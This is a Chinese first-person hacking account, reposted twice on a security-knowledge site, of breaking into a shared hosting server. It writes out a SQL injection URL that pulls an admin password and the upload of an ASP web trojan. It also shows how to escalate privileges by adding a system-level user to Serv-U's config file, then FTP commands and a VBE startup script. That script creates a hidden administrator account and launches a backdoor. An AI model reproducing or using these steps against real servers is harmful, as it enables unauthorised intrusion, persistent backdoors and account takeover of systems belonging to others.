黑客对一台虚拟主机服务器的渗透
网络安全 2021-07-03 09:40www.168986.cn网络安全知识
前几天听一树说了惊云下载系统的漏洞
问题文件出在admin/user.asp
提交
http://.xxx./down/admin/user.asp?user=admin’ and asc(mid(pwd,1,1))>37 and ’1’=’1
就相当于:
select from UserInfo where user=’admin’ and asc(mid(pwd,1,1))>37 and ’1’=’1’" 利用aess注入得到管理员密码
上面有一个文件upfile.htm
手工利用了下动网的upfile.asp漏洞
就成功上传了个asp木马
然后那个虚拟主机的c,d盘是NTFS分区
不能访问E盘装着servu,php,webmail,
F盘是虚拟站点
servu安装目录可写~
本来打算替换他servu文件的~觉的太麻烦
还容易让管理员怀疑
想起servu的本地提升来了 在自己计算机上装了个servu
添加了一个用户,设置为系统管理员,目录C:\,具有可执行权限
然后去servu安装目录里看ServUDaemon.ini
格式是这样的
[GLOBAL]
Version=5.0.0.11
LocalSetupPassword=072C63105200180D5C07170A7E3E
LocalSetupPortNo=60628
ProcessID=972
[DOMAINS]
Domain1=192.168.0.102||21|向导产生域|1|0|0
Domain2=192.168.0.102||2121|123|2|0|0
[Domain1]
User1=|1|0
[USER=|1]
Password=ih0C292E1AC82920B7F384007F302A1296
HomeDir=D:\xiaoben
TimeOut=600
Note1="Wizard generated aount"
Aess1=D:\xiaoben|RLPWAMCD
SKEYValues=
[Domain2]
User1=rover|1|0
User2=123|1|0
[USER=rover|2]
Password=dx5D12C060F16C7166779414FA038E881D
HomeDir=c:\
TimeOut=600
Maintenance=System
Aess1=C:\|RWAMELCDP
SKEYValues=
[USER=123|2]
Password=kv3F6EED70340AD1478ADF95963A07FD00
HomeDir=c:\
TimeOut=600
Aess1=C:\|RWAMLCDP
SKEYValues=
----------------
其中rover用户就是我添加的那个
在虚拟主机的网页木马上打开虚拟机的ServUDaemon.ini
访照我本地的INI写进一个用户进去
User1=rover|1|0
[USER=rover|2]
Password=dx5D12C060F16C7166779414FA038E881D
HomeDir=c:\
TimeOut=600
Maintenance=System
Aess1=C:\|RWAMELCDP
SKEYValues=
保存~ 用我新建的用户和密码连接~
好的,还是连上了
ftp
ftp>open ip
Connected to ip.
220 Serv-U FTP Server v5.0.0.4 for WinSock ready...
User (ip:(none)): id //输入构造的用户
331 User name okay, please send plete E-mail address as password.
Password:password //密码
230 User logged in, proceed.
ftp> cd winnt //进入win2k的winnt目录,如果是winxp或者是windows server 2003就应该为windows目录。
250 Directory changed to /WINNT
ftp>cd system32 //进入system32目录
250 Directory changed to /WINNT/system32
ftp>quote site exec .exe user rover rover1234 /add //利用系统的.exe文件加用户。
提示没有权限~郁闷~
我们有对C盘的访问权限了是不~hoho~
把后门(server.exe)传他system32目录
然后写一个VBs教本
set wshshell=createobject ("wscript.shell")
a=wshshell.run ("cmd.exe /c user tsinteruser rover1234 /add",0)
b=wshshell.run ("cmd.exe /c localgroup Administrators tsinteruser /add",0)
b=wshshell.run ("cmd.exe /c user tsinteruser /active:yes",0)
b=wshshell.run ("cmd.exe /c server.exe",0) 存为HELP.vbe
这个教本的作用是修改tsinteruser用户密码为rover1234
并且提升为管理员
然后执行system32目录下的server.exe
把这个教本传他C:\Documents and Settings\All Users\「开始」菜单\程序\启动
目录
这样管理员只要一登陆就会执行那个教本~
接下来就是等了~
等他登陆~
等了一段时间(看了一部蜘蛛侠的时间吧)~
连接后门~得到admin权限的shell
hoho~
接下来是善后工作了~就不说了
今天心情非常糟~有一些事情压的我喘不过气来
考试的时候当老师面把卷子撕了,然后扬步走了~
妈妈的~过程写的很乱~见谅
问题文件出在admin/user.asp
提交
http://.xxx./down/admin/user.asp?user=admin’ and asc(mid(pwd,1,1))>37 and ’1’=’1
就相当于:
select from UserInfo where user=’admin’ and asc(mid(pwd,1,1))>37 and ’1’=’1’" 利用aess注入得到管理员密码
上面有一个文件upfile.htm
手工利用了下动网的upfile.asp漏洞
就成功上传了个asp木马
然后那个虚拟主机的c,d盘是NTFS分区
不能访问E盘装着servu,php,webmail,
F盘是虚拟站点
servu安装目录可写~
本来打算替换他servu文件的~觉的太麻烦
还容易让管理员怀疑
想起servu的本地提升来了 在自己计算机上装了个servu
添加了一个用户,设置为系统管理员,目录C:\,具有可执行权限
然后去servu安装目录里看ServUDaemon.ini
格式是这样的
[GLOBAL]
Version=5.0.0.11
LocalSetupPassword=072C63105200180D5C07170A7E3E
LocalSetupPortNo=60628
ProcessID=972
[DOMAINS]
Domain1=192.168.0.102||21|向导产生域|1|0|0
Domain2=192.168.0.102||2121|123|2|0|0
[Domain1]
User1=|1|0
[USER=|1]
Password=ih0C292E1AC82920B7F384007F302A1296
HomeDir=D:\xiaoben
TimeOut=600
Note1="Wizard generated aount"
Aess1=D:\xiaoben|RLPWAMCD
SKEYValues=
[Domain2]
User1=rover|1|0
User2=123|1|0
[USER=rover|2]
Password=dx5D12C060F16C7166779414FA038E881D
HomeDir=c:\
TimeOut=600
Maintenance=System
Aess1=C:\|RWAMELCDP
SKEYValues=
[USER=123|2]
Password=kv3F6EED70340AD1478ADF95963A07FD00
HomeDir=c:\
TimeOut=600
Aess1=C:\|RWAMLCDP
SKEYValues=
----------------
其中rover用户就是我添加的那个
在虚拟主机的网页木马上打开虚拟机的ServUDaemon.ini
访照我本地的INI写进一个用户进去
User1=rover|1|0
[USER=rover|2]
Password=dx5D12C060F16C7166779414FA038E881D
HomeDir=c:\
TimeOut=600
Maintenance=System
Aess1=C:\|RWAMELCDP
SKEYValues=
保存~ 用我新建的用户和密码连接~
好的,还是连上了
ftp
ftp>open ip
Connected to ip.
220 Serv-U FTP Server v5.0.0.4 for WinSock ready...
User (ip:(none)): id //输入构造的用户
331 User name okay, please send plete E-mail address as password.
Password:password //密码
230 User logged in, proceed.
ftp> cd winnt //进入win2k的winnt目录,如果是winxp或者是windows server 2003就应该为windows目录。
250 Directory changed to /WINNT
ftp>cd system32 //进入system32目录
250 Directory changed to /WINNT/system32
ftp>quote site exec .exe user rover rover1234 /add //利用系统的.exe文件加用户。
提示没有权限~郁闷~
我们有对C盘的访问权限了是不~hoho~
把后门(server.exe)传他system32目录
然后写一个VBs教本
set wshshell=createobject ("wscript.shell")
a=wshshell.run ("cmd.exe /c user tsinteruser rover1234 /add",0)
b=wshshell.run ("cmd.exe /c localgroup Administrators tsinteruser /add",0)
b=wshshell.run ("cmd.exe /c user tsinteruser /active:yes",0)
b=wshshell.run ("cmd.exe /c server.exe",0) 存为HELP.vbe
这个教本的作用是修改tsinteruser用户密码为rover1234
并且提升为管理员
然后执行system32目录下的server.exe
把这个教本传他C:\Documents and Settings\All Users\「开始」菜单\程序\启动
目录
这样管理员只要一登陆就会执行那个教本~
接下来就是等了~
等他登陆~
等了一段时间(看了一部蜘蛛侠的时间吧)~
连接后门~得到admin权限的shell
hoho~
接下来是善后工作了~就不说了
今天心情非常糟~有一些事情压的我喘不过气来
考试的时候当老师面把卷子撕了,然后扬步走了~
妈妈的~过程写的很乱~见谅
网络安全培训
- 网络安全常见漏洞类型 网络安全常见漏洞类型包
- 绿色上网顺口溜七言 绿色上网的宣传标语
- 网络安全等级保护测评 网络安全等级保护条例
- 如何加强网络安全 网络安全隐患有哪些
- 网络安全防护措施有哪些 网络安全等级保护等级
- 如何保障网络安全 如何做好网络安全保障工作
- 维护网络安全的措施有哪些 维护网络安全的主要
- 网络安全工程师好学吗 2024年网络安全工程师好学
- 网络安全注意事项简短 网络安全注意事项100字
- 网络安全面临的挑战 当前网络安全面临的新问题
- 网络安全培训哪个靠谱 网络安全培训找哪个
- 普及网络安全知识内容 普及网络安全教育
- 网络安全防范知识宣传内容 网络安全防范知识宣
- 如何做好网络安全工作 如何做好网络安全工作
- 网络安全常识的丰富内容 网络安全的相关知识
- 青少年网络安全教育片 青少年网络安全知识讲座